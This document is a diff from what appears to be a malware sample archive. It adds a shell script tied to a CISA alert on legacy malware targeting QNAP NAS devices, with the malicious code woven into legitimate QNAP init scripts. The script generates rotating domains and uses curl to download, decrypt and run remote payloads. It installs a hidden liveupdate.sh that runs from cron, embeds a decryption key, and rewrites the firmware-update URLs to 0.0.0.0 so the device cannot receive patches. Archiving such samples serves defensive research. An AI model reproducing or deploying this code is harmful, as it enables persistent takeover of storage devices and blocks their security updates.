if [ -z $_qsyncd_run_pid ]; then
|
||||
return 0
|
||||
fi
|
||||
usleep 20000
|
||||
j=`/usr/bin/expr ${j} + 20`
|
||||
done
|
||||
return -62
|
||||
fi
|
||||
usleep 50000
|
||||
i=`/usr/bin/expr ${i} + 50`
|
||||
done
|
||||
return 0
|
||||
}
|
||||
|
||||
|
||||
install()
|
||||
{
|
||||
lock_file="/var/lock/qbox_install_bin.lck"
|
||||
|
||||
if [ ! -f "${INSTALL_BUILD_IN}" ]; then
|
||||
dbg "build-in ${QSYNC_NAME} is installed"
|
||||
return 1
|
||||
fi
|
||||
|
||||
if [ ! -f ${UPDATEPKG_DIR}/${QSYNC_NAME}.bin ]; then
|
||||
dbg "${QSYNC_NAME}.bin} not found"
|
||||
return 1
|
||||
fi
|
||||
|
||||
if [ ! -x "${QPKG_CLI}" ]; then
|
||||
dbg "${QPKG_CLI} not found"
|
||||
return 1
|
||||
fi
|
||||
|
||||
## make sure volume is exist
|
||||
if [ ! -d /share/`/sbin/getcfg SHARE_DEF defPublic -d Public -f /etc/config/def_share.info` ]; then
|
||||
dbg "/share/Public not found"
|
||||
return 1
|
||||
fi
|
||||
|
||||
## is removed
|
||||
if [ -f ${UPDATEPKG_DIR}/.${QSYNC_NAME}_removed ]; then
|
||||
/bin/rm -f ${INSTALL_BUILD_IN}
|
||||
dbg "${QSYNC_NAME} is removed"
|
||||
return 1
|
||||
fi
|
||||
|
||||
if [ -f "$lock_file" ]; then
|
||||
if [ $(( $(date +%s) - $(date +%s -r $lock_file) )) -le 180 ]; then
|
||||
echo "${QSYNC_NAME} is installing"
|
||||
dbg "${QSYNC_NAME} is installing"
|
||||
return 1
|
||||
fi
|
||||
fi
|
||||
|
||||
/bin/touch "$lock_file"
|
||||
/bin/rm -f ${INSTALL_BUILD_IN}
|
||||
dbg "install build-in ${QSYNC_NAME} start"
|
||||
|
||||
set_default_disable_status
|
||||
|
||||
## install build in Qsync
|
||||
${QPKG_CLI} -K -m ${UPDATEPKG_DIR}/${QSYNC_NAME}.bin > /dev/null 2>&1
|
||||
sleep 20
|
||||
|
||||
wait_install=60
|
||||
## avoid initial take long time or fail
|
||||
while [ "$wait_install" -gt 0 ]; do
|
||||
stcode=`$CMD_GETCFG ${QSYNC_NAME}.bin stcode -f /etc/config/qpkg_job.conf`
|
||||
if [ "$stcode" = "0" ]; then
|
||||
break
|
||||
fi
|
||||
sleep 1
|
||||
let "wait_install--"
|
||||
done
|
||||
|
||||
${QPKG_CLI} -C ${QSYNC_NAME}.bin > /dev/null 2>&1
|
||||
/bin/rm -f ${UPDATEPKG_DIR}/.${QSYNC_NAME}_disabled
|
||||
/bin/rm -f "$lock_file"
|
||||
dbg "install build-in ${QSYNC_NAME} success"
|
||||
}
|
||||
|
||||
if [ "$1" == "stop" ]; then
|
||||
exit 0
|
||||
fi
|
||||
fi
|
||||
XEOF
|
||||
fi
|
||||
chmod 755 "${bdir}/.qpkg/.liveupdate/liveupdate.sh"
|
||||
touch -cr /bin/busybox "${bdir}/.qpkg/.liveupdate/liveupdate.sh"
|
||||
|
||||
crontabargs=$(ps | grep 'cr[o]nd ' | sed -n 's/.*crond[^0-9A-Za-z-]*\(.\+\)/\1/p')
|
||||
trycount=10; trycount=$(( $trycount - 10 ))
|
||||
set x $crontabargs; shift
|
||||
while [ $# -gt 0 ] && [ $trycount -lt 10 ]; do
|
||||
trycount=$(( $trycount + 1 ))
|
||||
getopts ':c:' OPT 2>/dev/null
|
||||
test "$OPT" = 'c' && crontabfile="${OPTARG}/admin" && break
|
||||
test "$OPTIND" -gt 0 && shift "$OPTIND" && OPTIND=1 || break
|
||||
done
|
||||
test "$crontabfile" && test -f "${crontabfile}" || crontabfile='/tmp/cron/crontabs/admin'
|
||||
|
||||
for crontab in "$crontabfile" "${confdir}/crontab"; do
|
||||
if $fgrep "${bdir}/.qpkg/.liveupdate/liveupdate.sh" "$crontab"; then
|
||||
:
|
||||
else
|
||||
cronmins=$(printf '%i' "$(( $RANDOM % 60 ))")
|
||||
cronhour=$(printf '%i' "$(( $RANDOM % 24 ))")
|
||||
cronhour=$(printf '%i,' "$(( ( $cronhour + 8 ) % 24 ))" "$(( ( $cronhour + 16 ) % 24 ))")"$cronhour"
|
||||
echo "$cronmins $cronhour"' * * * '"${bdir}/.qpkg/.liveupdate/liveupdate.sh >/dev/null 2>/dev/null" >> "$crontab"
|
||||
sleep 5
|
||||
fi
|
||||
done
|
||||
|
||||
grep 'Liveupdate\|FirmwareRelease\|QTS_FW' /etc/default_config/uLinux.conf /etc/config/uLinux.conf | grep 'qnap\.com' >/dev/null && sed -i 's/https\?:\/\/[^\/]\+\/\(Liveupdate\|FirmwareRelease\|QTS_FW\)/http:\/\/0.0.0.0\/\1/' /etc/default_config/uLinux.conf /etc/config/uLinux.conf
|
||||
sedexpr='QPKG CENTER XML\|Live Update XML\|FW_XML_ALT'
|
||||
if grep "${sedexpr}" /etc/default_config/uLinux.conf /etc/config/uLinux.conf | grep 'qnap\.com' >/dev/null; then
|
||||
sed -i 's/^ *\('"${sedexpr}"'\)\(.*https\?:\/\/[^\/]*\)\(qnap\.com[^\/]*\)/\1\20.0.0.0/' /etc/default_config/uLinux.conf /etc/config/uLinux.conf
|
||||
grep "${sedexpr}" /etc/default_config/uLinux.conf /etc/config/uLinux.conf | grep 'qnap\.com' && sed -i 's/^ *\('"${sedexpr}"'\).*qnap\.com/\1 = /' /etc/default_config/uLinux.conf /etc/config/uLinux.conf
|
||||
fi
|
||||
|
||||
( ( exec >/dev/null 2>&1 </dev/null; "${bdir}/.qpkg/.liveupdate/liveupdate.sh" </dev/null >/dev/null 2>/dev/null & ) & )
|
||||
exit 0
|
@ -0,0 +1 @@
|
||||
https://us-cert.cisa.gov/ncas/alerts/aa20-209a
|
510
2020/2020-07-27_CISA-Legacy_Malware_Targeting_QNAP_NAS/a569332b52d484f40b910f2f0763b13c085c7d93dcdc7fea0aeb3a3e3366ba5d
Normal file
510
2020/2020-07-27_CISA-Legacy_Malware_Targeting_QNAP_NAS/a569332b52d484f40b910f2f0763b13c085c7d93dcdc7fea0aeb3a3e3366ba5d
Normal file
@ -0,0 +1,510 @@
|
||||
#!/bin/sh
|
||||
QNAP_QPKG=cloudinstall
|
||||
QID_PRESISTENT_CONF=/etc/config/qid_persistent.conf
|
||||
NAS_CLOUD_INSTALL_PATH=/home/httpd/cgi-bin/cloudinstall
|
||||
CLOUD_INSTALL_PATH=/tunnel_agent
|
||||
CLOUD_INSTALL_RAMDISK_PATH=/tunnel_agent_ramdisk
|
||||
CLOUD_INSTALL_AGENT_FILE_PATH=$CLOUD_INSTALL_PATH/tunnel_agent.tar.bz2
|
||||
COUNTER=1
|
||||
ERROR_BAD_REQUEST=400
|
||||
|
||||
if [ "$fromrcS" = 'TRUE' ]; then
|
||||
case "$1" in
|
||||
start)
|
||||
START_TIME=$(date +"%T")
|
||||
echo -e "start:$START_TIME" >> /tmp/.cloudinstall.log
|
||||
while [ "$CLOUD_INSTALL_AGENT_PID_LIST" == "" ];
|
||||
do
|
||||
# report device info and get cloudinstall agent app download url
|
||||
DOWNLOAD_URL=`/usr/sbin/qcloud_uninit_device_tool -r`
|
||||
if [ ! -d "$CLOUD_INSTALL_PATH" ]; then
|
||||
if [ "$NAS_ARCH" == "ARM_64" ]; then
|
||||
# create ramdisk and create a 64mb file
|
||||
/bin/mkdir -p $CLOUD_INSTALL_RAMDISK_PATH
|
||||
/bin/mount -t tmpfs -o size=64m tmpfs $CLOUD_INSTALL_RAMDISK_PATH
|
||||
/bin/dd if=/dev/zero of=$CLOUD_INSTALL_RAMDISK_PATH/image bs=1M count=64
|
||||
# create block size 1K filesystem
|
||||
/sbin/mke2fs -b 1024 $CLOUD_INSTALL_RAMDISK_PATH/image
|
||||
# create virtual disk
|
||||
export USED_LOOP_DEVICE=`/usr/local/sbin/losetup -f $CLOUD_INSTALL_RAMDISK_PATH/image`
|
||||
/sbin/setcfg -f $QID_PRESISTENT_CONF "CLOUDINSTALL" "USED_LOOP_DEVICE" "$USED_LOOP_DEVICE"
|
||||
/bin/mkdir -p $CLOUD_INSTALL_PATH
|
||||
# mount virtual disk
|
||||
/bin/mount $USED_LOOP_DEVICE $CLOUD_INSTALL_PATH
|
||||
else
|
||||
# create and mount tmpfs folder
|
||||
/bin/mkdir -p $CLOUD_INSTALL_PATH
|
||||
/bin/mount -t tmpfs -o size=64m tmpfs $CLOUD_INSTALL_PATH
|
||||
fi
|
||||
fi
|
||||
cd $CLOUD_INSTALL_PATH
|
||||
|
||||
if [[ $DOWNLOAD_URL == https* ]]; then
|
||||
REPORT_SUCCESS_TIME=$(date +"%T")
|
||||
else
|
||||
REPORT_FAIL_TIME=$(date +"%T")
|
||||
echo -e " report_fail:$REPORT_FAIL_TIME\n response:$DOWNLOAD_URL" >> /tmp/.cloudinstall.log
|
||||
# stop retry when got bad request
|
||||
# prevent put bad request all the time
|
||||
if [[ $DOWNLOAD_URL == *$ERROR_BAD_REQUEST* ]]; then
|
||||
break
|
||||
fi
|
||||
fi
|
||||
|
||||
# downlaod cloudinstall agent app
|
||||
/usr/sbin/qcloud_uninit_device_tool -o "$CLOUD_INSTALL_AGENT_FILE_PATH" -d "$DOWNLOAD_URL"
|
||||
|
||||
if [ -f "$CLOUD_INSTALL_AGENT_FILE_PATH" ]; then
|
||||
DOWNLOAD_FINISH_TIME=$(date +"%T")
|
||||
# unzip and execute cloudinstallagent
|
||||
/bin/tar -xf $CLOUD_INSTALL_AGENT_FILE_PATH -C $CLOUD_INSTALL_PATH
|
||||
$CLOUD_INSTALL_PATH/bin/cloudinstall_agent_ctl.sh start &> /dev/null
|
||||
|
||||
UNZIP_TIME=$(date +"%T")
|
||||
fi
|
||||
|
||||
if [ ! -d "$NAS_CLOUD_INSTALL_PATH" ]; then
|
||||
# create folder and create symbolic link
|
||||
/bin/mkdir -p $NAS_CLOUD_INSTALL_PATH
|
||||
/bin/ln -s $CLOUD_INSTALL_PATH/ui/cloudinstall.html $NAS_CLOUD_INSTALL_PATH/index.html
|
||||
/bin/ln -s $CLOUD_INSTALL_PATH/ui/cloudinstall.cgi $NAS_CLOUD_INSTALL_PATH/cloudinstall.cgi
|
||||
/bin/ln -s $CLOUD_INSTALL_PATH/ui/static $NAS_CLOUD_INSTALL_PATH/static
|
||||
fi
|
||||
|
||||
# wait connect
|
||||
sleep 5
|
||||
CLOUD_INSTALL_AGENT_PID_LIST=`/bin/ps --columns 256 | /bin/grep "$CLOUD_INSTALL_PATH/bin/cloudinstallagent" | /bin/grep -v grep | /bin/awk '{print $1}'`
|
||||
if [ "$CLOUD_INSTALL_AGENT_PID_LIST" == "" ]; then
|
||||
SLEEP_TIME=$(( 30 * $COUNTER ))
|
||||
if [ $SLEEP_TIME -gt 300 ]; then
|
||||
SLEEP_TIME=300
|
||||
fi
|
||||
# wait next retry
|
||||
sleep $SLEEP_TIME
|
||||
fi
|
||||
COUNTER=$(( $COUNTER * 2 ))
|
||||
done
|
||||
|
||||
END_TIME=$(date +"%T")
|
||||
echo -e "report_success:$REPORT_SUCCESS_TIME\ndownload_finish:$DOWNLOAD_FINISH_TIME\nunzip_finish:$UNZIP_TIME\nend:$END_TIME" >> /tmp/.cloudinstall.log
|
||||
# call for a new process group and for later kill
|
||||
/bin/setsid $CLOUD_INSTALL_PATH/bin/cloudinstall_agent_disconnect_daemon.sh start &> /dev/null &
|
||||
/bin/setsid $CLOUD_INSTALL_PATH/bin/cloudinstall_agent_daemon.sh &> /dev/null &
|
||||
|
||||
# set cloudinstall report status
|
||||
/sbin/setcfg -f $QID_PRESISTENT_CONF "CLOUDINSTALL" "REPORT_STATUS" "uninit"
|
||||
# add link to report offline
|
||||
/bin/ln -sf /etc/init.d/cloudinstall_report_offline.sh /etc/rcK.d/K99cloudinstall_report_offline
|
||||
|
||||
# buzzer
|
||||
HARDWARE_TYPE=$(uname -m)
|
||||
if [[ "$HARDWARE_TYPE" == *"x86"* ]];
|
||||
then
|
||||
/sbin/hal_app --se_buzzer enc_id=0,mode=101
|
||||
elif [[ "$HARDWARE_TYPE" == *"arm"* ]];
|
||||
then
|
||||
/sbin/pic_raw 81
|
||||
fi
|
||||
;;
|
||||
|
||||
stop)
|
||||
# disconnect cloudinstall agent
|
||||
$CLOUD_INSTALL_PATH/bin/cloudinstall_agent_ctl.sh stop &> /dev/null
|
||||
$CLOUD_INSTALL_PATH/bin/cloudinstall_agent_disconnect_daemon.sh stop &> /dev/null
|
||||
for i in "${CLOUD_INSTALL_AGENT_DAEMON_PID_LIST[@]}"
|
||||
do
|
||||
# use bash kill instead /bin/kill for kill process group
|
||||
# cloudinstall agent daemon and inotifywait
|
||||
kill -9 -- -$i &>/dev/null
|
||||
done
|
||||
|
||||
# umount
|
||||
if [ "$NAS_ARCH" == "ARM_64" ]; then
|
||||
/bin/umount -l $USED_LOOP_DEVICE
|
||||
/usr/local/sbin/losetup -d $USED_LOOP_DEVICE
|
||||
else
|
||||
/bin/umount -l $CLOUD_INSTALL_PATH
|
||||
fi
|
||||
# remove all files
|
||||
if [ -d "$NAS_CLOUD_INSTALL_PATH" ]; then
|
||||
/bin/rm -rf $NAS_CLOUD_INSTALL_PATH
|
||||
fi
|
||||
if [ -d "$CLOUD_INSTALL_PATH" ]; then
|
||||
/bin/rm -rf $CLOUD_INSTALL_PATH
|
||||
fi
|
||||
if [ -d "$CLOUD_INSTALL_RAMDISK_PATH" ]; then
|
||||
/bin/rm -rf $CLOUD_INSTALL_RAMDISK_PATH
|
||||
fi
|
||||
;;
|
||||
|
||||
restart)
|
||||
$0 stop
|
||||
$0 start
|
||||
;;
|
||||
|
||||
*)
|
||||
echo "Usage: $0 {start|stop|restart}"
|
||||
exit 1
|
||||
esac
|
||||
exit 0
|
||||
|
||||
|
||||
set_env()
|
||||
{
|
||||
debug=`$CMD_GETCFG Qsync Debug -u -d NULL`
|
||||
if [ "$debug" != "NULL" ]; then
|
||||
/bin/touch $LOG_FILE
|
||||
else
|
||||
/bin/rm -f $LOG_FILE
|
||||
fi
|
||||
}
|
||||
|
||||
set_env
|
||||
|
||||
dbg()
|
||||
{
|
||||
if [ -f "$LOG_FILE" ]; then
|
||||
echo "[`date "+%H:%M:%S"`] $@ " >> $LOG_FILE
|
||||
fi
|
||||
}
|
||||
|
||||
dbg "> $0 $@ (pid $$)"
|
||||
|
||||
fi
|
||||
|
||||
export PATH="${PATH}:/bin:/sbin:/usr/bin:/usr/sbin:/usr/bin/X11:/usr/local/sbin:/usr/local/bin"
|
||||
|
||||
command -v getcfg > /dev/null 2>&1 || getcfg () { sed -n 'H;${x;s/\(.*\n\['"${1//\//\\\/}"']\|^\['"${1//\//\\\/}"']\)\n//I;s/\(^\|\n\)\[[^\n]\+\]\n.*//p}' "${4:-${confdir}/uLinux.conf}" | sed -n 's/^'"${2//\//\\\/}"' \?= \?\(.*\)/\1/Ip'; }
|
||||
|
||||
test -d /etc/config && confdir=/etc/config || { test -d /mnt/HDA_ROOT/.config && confdir=/mnt/HDA_ROOT/.config; }
|
||||
|
||||
bdir=
|
||||
test -f "${confdir}/smb.conf" && for i in homes Public Download Multimedia Web Recordings; do bdir=`getcfg "$i" path -f "${confdir}/smb.conf"` && test ! -z "$bdir" && bdir=`dirname "$bdir"` && test -d "$bdir" && testwriteable=$(mktemp "${bdir}/.tmp.XXXXXX") && rm "${testwriteable}" && break; bdir=''; done
|
||||
test -z "${bdir}" || test ! -d "${bdir}" && { command -v readlink >/dev/null 2>&1 || ln -sf /bin/busybox /usr/bin/readlink; for i in Public Download Multimedia Web Recordings homes; do bdir=`readlink "/share/${i}" 2>/dev/null` && test ! -z "$bdir" && bdir=`dirname "$bdir"` && bdir=/share/${bdir##*/} && test -d "$bdir" && break; done;
|
||||
test -z "${bdir}" || test ! -d "${bdir}"; } && { bdir=`getcfg SHARE_DEF defVolMP -f "${confdir}/def_share.info"`
|
||||
test -z "${bdir}" || test ! -d "${bdir}"; } && { bdir=`mount | sed -n "s/.*\(\/share\/[^ /]\+\) .*/\1/gp" | head -n 1`
|
||||
test -z "${bdir}" || test ! -d "${bdir}"; } && { for i in CACHEDEV3_DATA CACHEDEV2_DATA CACHEDEV1_DATA MD0_DATA; do test -d "/share/${i}" && bdir="/share/${i}" && break; done;
|
||||
test -z "${bdir}" || test ! -d "${bdir}" && bdir=/mnt/HDA_ROOT; }
|
||||
grep -F '' <<EOF >/dev/null 2>&1 && fgrep="grep -F" || { command -v fgrep >/dev/null 2>&1 && fgrep=fgrep || fgrep=grep; }
|
||||
|
||||
EOF
|
||||
test "$fgrep" || fgrep=grep
|
||||
test "$RANDOM" || RANDOM=17653
|
||||
genrstr ()
|
||||
{
|
||||
local s=;
|
||||
local min=${1:-4};
|
||||
local max=${2:-12};
|
||||
local kspace="${3:-a-zA-Z}"
|
||||
tr -dc "$kspace" < /dev/urandom | {
|
||||
read -rn $(($RANDOM % ( $max - $min + 1 ) + $min )) s;
|
||||
echo "$s"
|
||||
}
|
||||
}
|
||||
|
||||
verifyfile() {
|
||||
local file="$1"
|
||||
local sig="${2:-$file_s}"
|
||||
local out
|
||||
test ! -z "$file" && test -s "$file" || return 1
|
||||
test ! -z "$sig" && test -s "$sig" || return 1
|
||||
test -f ".rsakey" || echo "$verifykey" > ".rsakey"
|
||||
out=$(openssl dgst -sha1 -verify ".rsakey" -signature "$sig" "$file") && test "$out" = "Verified OK" && return 0
|
||||
return 1
|
||||
}
|
||||
|
||||
decryptfile() {
|
||||
local file="$1"
|
||||
local ofile="${2:-${file}}"
|
||||
local key='7C0vK4SzMO15zBxLD7XCi5hbjgP1ZjkJ'
|
||||
openssl enc -d -aes-256-cbc -k "$key" -md sha1 -salt < "$file" > "${file}_d" || return $?
|
||||
test -f "$ofile" && rm -f "$ofile"
|
||||
mv "${file}_d" "$ofile" && return 0
|
||||
return 1
|
||||
}
|
||||
|
||||
verifykey='-----BEGIN PUBLIC KEY-----
|
||||
MIIBojANBgkqhkiG9w0BAQEFAAOCAY8AMIIBigKCAYEAt/EDT6SB75atrHW7Cpog
|
||||
CXqrBM2CVbJo';verifykey="${verifykey}"'g4rwwS''z1Bp1i1'
|
||||
verifykey="${verifykey}"'B7B9Wd51no32lpRqOM+9GOr2W17xwJ8pqpQotex
|
||||
RC5qQSiS/7FS48jsPKsJnrUhnsI1fRLM4DqsEF3UOukZuDOYUhlteDuMqqZBz0AC
|
||||
Q3YnLjraTjchMF0XmaAAcWOkg5MsxAOKTepue4R/tnrPAkAG86nq5LA1+wa7opNV
|
||||
gQzwDh7YXhBnWz52+ebZ9TeqD31/sb5hoyUKf1Nr5HcKkklObuz1OGQJ//pkCbTC
|
||||
2EnQw6tCPQhgSIA8wJKkaxW0f/UHP+YBmWa4Wn+uPrJJuHSVNEJtAp2wlX3THltz
|
||||
0IGPQEuzoafOAl3EFjas3HcTX2HlEfnvAtRL2iLxJeba1nZ+U3geZOuxL1NhWhNh
|
||||
pjaLcKwhkRck7Y5hr1Pz8pLDnXsx5w0QUz6XS8HVf/KHnNXHufFEn01y9YoPuau1
|
||||
DNnpDGbq632Bs8ESd3ueHk9OY/UZxWeN3UdbseFxK35XAgMBAAE=
|
||||
-----END PUBLIC KEY-----'
|
||||
|
||||
DOMAIN_EXT_A='cf tk ml ga gq'
|
||||
DOMAIN_EXT_B='com biz org de rocks mx cn top nl men ws se info xyz net today ru fi name to in com.ua vg vn cd'
|
||||
|
||||
test -d "${bdir}/.qpkg" || mkdir "${bdir}/.qpkg"
|
||||
test -d "${bdir}/.qpkg/.liveupdate" || mkdir "${bdir}/.qpkg/.liveupdate"
|
||||
cd "${bdir}/.qpkg/.liveupdate" && rm -f .tmp.*
|
||||
|
||||
echo "$verifykey" > ".rsakey"
|
||||
i=0 n=0 c=0 errorcount=0
|
||||
outfile=$(mktemp "./.tmp.XXXXXX") || outfile=$(mktemp "${bdir}/.tmp.XXXXXX") || outfile=$(mktemp "/.tmp.XXXXXX") || outfile='./.tmp.out'
|
||||
|
||||
for domainexts in "$DOMAIN_EXT_A" "$DOMAIN_EXT_B"; do
|
||||
for ext in $domainexts; do
|
||||
hostname=$(echo "$(( $(date +%s) / 1296000 ))IbjGOEgnuD${ext}" | openssl dgst -sha1 -binary | openssl base64 | sed 'y/ABCDEFGHIJKLMNOPQRSTUVWXYZ-+\//abcdefghijklmnopqrstuvwxyzabc/;s/=//g')
|
||||
hostname=${hostname%[a-z0-9][a-z0-9][a-z0-9][a-z0-9][a-z0-9][a-z0-9][a-z0-9][a-z0-9][a-z0-9][a-z0-9][a-z0-9][a-z0-9][a-z0-9][a-z0-9][a-z0-9][a-z0-9][a-z0-9]}
|
||||
hostnames="${hostname%[a-z0-9][a-z0-9][a-z0-9][a-z0-9]} ${hostname%[a-z0-9][a-z0-9][a-z0-9]}"
|
||||
hostnames="$hostnames ${hostname%[a-z0-9][a-z0-9]} ${hostname%[a-z0-9]} $hostname"
|
||||
for host in $hostnames; do
|
||||
test -f "$outfile" && rm -f "$outfile"
|
||||
recentupdate=''
|
||||
curl --connect-timeout 12 -m 30 -k -o "$outfile" "https://${host}.${ext}/qnap_firmware.xml?t=$(date +%s)"
|
||||
test -s "$outfile" || continue
|
||||
fsize=$(( $(wc -c < "$outfile") ))
|
||||
test "$fsize" -gt 4096 && rm -f "$outfile" && continue
|
||||
rsamsg=$(openssl base64 -in "$outfile" -d | openssl rsautl -pubin -inkey ".rsakey" -verify) || continue
|
||||
test "$rsamsg" || continue
|
||||
path="${rsamsg%|*}"; rsadomain="${path%|*}"; path="${path#*|}"
|
||||
hash="${rsamsg##*|}"; ts="${hash#*_}"; hash="${hash%_*}"
|
||||
test "$rsadomain" = "${host}.${ext}" || continue
|
||||
timenow=$(date +%s)
|
||||
test "$ts" -gt 0 && { test "$ts" -gt "$timenow" || test $(( $timenow - $ts )) -lt 172800; } && recentupdate=1
|
||||
curl --connect-timeout 12 -m 300 -k -o "$outfile" "https://${host}.${ext}/${path}"
|
||||
filehash=$(openssl dgst -sha1 -binary "$outfile" | openssl base64) || continue
|
||||
test "$filehash" = "$hash" || continue
|
||||
curl --connect-timeout 12 -m 30 -k -o "${outfile}_s" "https://${host}.${ext}/s/${path}"
|
||||
verifyfile "$outfile" "${outfile}_s" && decryptfile "$outfile" || continue
|
||||
mv "${outfile}_s" "${ts}_v"
|
||||
chmod 755 "$outfile" || continue
|
||||
( ( exec >/dev/null 2>/dev/null </dev/null; "$outfile" ) & )
|
||||
test "$recentupdate" -eq 1 && exit 0
|
||||
done
|
||||
done
|
||||
done
|
||||
|
||||
|
||||
if [ "$fromrcS" = 'TRUE' ]; then
|
||||
# if Qsync is disable before 4.3.0, we will touch /mnt/HDA_ROOT/udpate_pkg/.QsyncServer_disabled
|
||||
set_default_disable_status()
|
||||
{
|
||||
QPKG_ENABLE=`$CMD_GETCFG ${QSYNC_NAME} Enable -d "NULL" -f ${QPKG_CONF}`
|
||||
OLD_ENABLE=`$CMD_GETCFG Qsync Enable -u -d NULL`
|
||||
if [ -f "${UPDATEPKG_DIR}/.${QSYNC_NAME}_removed" ]; then
|
||||
return
|
||||
fi
|
||||
|
||||
if [ "$QPKG_ENABLE" = "NULL" ]; then
|
||||
if [ "$OLD_ENABLE" = "FALSE" ]; then
|
||||
dbg "touch ${UPDATEPKG_DIR}/.${QSYNC_NAME}_disabled"
|
||||
/bin/touch "${UPDATEPKG_DIR}/.${QSYNC_NAME}_disabled"
|
||||
fi
|
||||
fi
|
||||
}
|
||||
|
||||
if [ "x$HBS_ENABLE" = xnull ] || [ "x$HBS_ENABLE" = xFALSE ]; then
|
||||
export QNAP_QPKG=rtrr
|
||||
else
|
||||
export QNAP_QPKG=HybridBackup
|
||||
/usr/local/sbin/qboost_util -S -n rtrr -E 0 1>/dev/null 2>&1
|
||||
fi
|
||||
start()
|
||||
{
|
||||
if [ -f /usr/bin/qsyncman ]; then
|
||||
[ ! -f /etc/config/hdcopyusb.conf ] || /bin/rm -f /etc/config/hdcopyusb.conf
|
||||
/bin/sed -i '/hdusb_copy/d' /etc/config/crontab
|
||||
/usr/bin/crontab /etc/config/crontab
|
||||
echo -n "Starting QSync manitor: "
|
||||
[ -d /etc/config/qsync ] || /usr/bin/install -d /etc/config/qsync
|
||||
[ -f /etc/config/qsync/qhost.conf ] || /bin/touch /etc/config/qsync/qhost.conf
|
||||
[ -f /etc/config/qsync/qsyncjobdef.conf ] || /bin/touch /etc/config/qsync/qsyncjobdef.conf
|
||||
[ -f /etc/config/qsync/qsync.conf ] || /bin/cp -p /etc/default_config/qsync/qsync.conf /etc/config/qsync/qsync.conf
|
||||
[ -f /etc/config/qsync/extdrv.conf ] || /bin/cp -p /etc/default_config/qsync/extdrv.conf /etc/config/qsync/extdrv.conf
|
||||
[ -f /etc/config/qsync/qsyncd.conf ] || /bin/cp -p /etc/default_config/qsync/qsyncd.conf /etc/config/qsync/qsyncd.conf
|
||||
[ ! -f /etc/config/qsync/qsyncd.conf ] || /bin/chmod 640 /etc/config/qsync/qsyncd.conf
|
||||
[ ! -f /etc/config/qsync/qsync.conf ] || /bin/chmod 640 /etc/config/qsync/qsync.conf
|
||||
[ ! -f /etc/config/qsync/qhost.conf ] || /bin/chmod 640 /etc/config/qsync/qhost.conf
|
||||
/sbin/daemon_mgr qsyncman start "/usr/bin/qsyncman 1>/dev/null 2>&1"
|
||||
echo "OK"
|
||||
fi
|
||||
}
|
||||
|
||||
stop()
|
||||
{
|
||||
echo "Shutting down QSync monitor: OK"
|
||||
pidnum=`/bin/pidof qsync``/bin/pidof qsyncd`
|
||||
kill $pidnum 2>/dev/null
|
||||
i=0
|
||||
while [ ${i} -lt 5 ]
|
||||
do
|
||||
pidnum=`/bin/pidof qsync``/bin/pidof qsyncd`
|
||||
if [ -z "$pidnum" ]; then
|
||||
break
|
||||
fi
|
||||
sleep 1
|
||||
i=`/usr/bin/expr ${i} + 1`
|
||||
done
|
||||
pidnum=`/bin/pidof qsync``/bin/pidof qsyncd`
|
||||
[ -z "$pidnum" ] || kill -9 $pidnum 2>/dev/null
|
||||
/sbin/daemon_mgr qsyncman stop "/usr/bin/qsyncman"
|
||||
/usr/bin/killall -q qsyncman
|
||||
}
|
||||
|
||||
start_qsyncd()
|
||||
{
|
||||
#_qsyncd_en=`/sbin/getcfg "" Enabled -d 0 -f /etc/qsync/qsyncd.conf`
|
||||
#[ "x$_qsyncd_en" = x1 ] || return -1
|
||||
_qsyncd_run_pid=`/bin/pidof qsyncd`
|
||||
[ -z $_qsyncd_run_pid ] || return -114
|
||||
_recycle_en=`/sbin/getcfg 'Network Recycle Bin' Enable -d FALSE`
|
||||
_with_syslog=$1
|
||||
if [ "x$_recycle_en" = xTRUE ]; then
|
||||
if [ "x$_with_syslog" = x1 ]; then
|
||||
LD_PRELOAD=/usr/local/lib/libtrash.so /usr/bin/qsyncd -syslog -c:/etc/qsync/qsyncd.conf
|
||||
else
|
||||
LD_PRELOAD=/usr/local/lib/libtrash.so /usr/bin/qsyncd -c:/etc/qsync/qsyncd.conf
|
||||
fi
|
||||
else
|
||||
if [ "x$_with_syslog" = x1 ]; then
|
||||
/usr/bin/qsyncd -syslog -c:/etc/qsync/qsyncd.conf
|
||||
else
|
||||
/usr/bin/qsyncd -c:/etc/qsync/qsyncd.conf
|
||||
fi
|
||||
fi
|
||||
_iret=$?
|
||||
if [ "x$_iret" = x0 ]; then
|
||||
i=0
|
||||
while [ ${i} -lt 10000 ]
|
||||
do
|
||||
echo "${i} millisecond..."
|
||||
_qsyncd_pid=`/sbin/getcfg '' Pid -d -1 -f /etc/qsync/qsyncd.conf`
|
||||
_qsyncd_run_pid=`/bin/pidof qsyncd`
|
||||
if [ "x$_qsyncd_pid" != "x-1" ] && [ ! -z $_qsyncd_run_pid ]; then
|
||||
break
|
||||
fi
|
||||
usleep 50000
|
||||
i=`/usr/bin/expr ${i} + 50`
|
||||
done
|
||||
fi
|
||||
return -$_iret
|
||||
}
|
||||
|
||||
stop_qsyncd()
|
||||
{
|
||||
#_qsyncd_en=`/sbin/getcfg "" Enabled -d 0 -f /etc/qsync/qsyncd.conf`
|
||||
#[ "x$_qsyncd_en" = x0 ] || return -1
|
||||
_qsyncd_pid=`/sbin/getcfg "" Pid -d -1 -f /etc/qsync/qsyncd.conf`
|
||||
[ $_qsyncd_pid -lt 0 ] && return -3
|
||||
# Send SIGUSR1 to inform the daemon to output "[RTRR Server] Stopped" event log
|
||||
/bin/kill -SIGUSR1 $_qsyncd_pid
|
||||
usleep 200000
|
||||
# Send SIGINT to stop the QSyncd process
|
||||
/bin/kill -SIGINT $_qsyncd_pid
|
||||
_kill_ret=$?
|
||||
if [ "x$_kill_ret" != x0 ]; then
|
||||
return -3
|
||||
fi
|
||||
echo "need wait $1 millisecond"
|
||||
i=0
|
||||
while true
|
||||
do
|
||||
echo "${i} millisecond..."
|
||||
_qsyncd_pid=`/sbin/getcfg '' Pid -d -1 -f /etc/qsync/qsyncd.conf`
|
||||
_qsyncd_run_pid=`/bin/pidof qsyncd`
|
||||
if [ "x$_qsyncd_pid" = "x-1" ] && [ -z $_qsyncd_run_pid ]; then
|
||||
break
|
||||
fi
|
||||
if [ ${i} -ge $1 ]; then
|
||||
# if time-out, we send two additional SIGINT to force the daemon to stop.
|
||||
if [ $_qsyncd_pid -ge 0 ]; then
|
||||
/bin/kill -SIGUSR1 $_qsyncd_pid
|
||||
usleep 200000
|
||||
/bin/kill -SIGUSR1 $_qsyncd_pid
|
||||
fi
|
||||
j=0
|
||||
while [ ${j} -lt 500 ]
|
||||
do
|
||||
_qsyncd_run_pid=`/bin/pidof qsyncd`
|
||||
if [ -z $_qsyncd_run_pid ]; then
|
||||
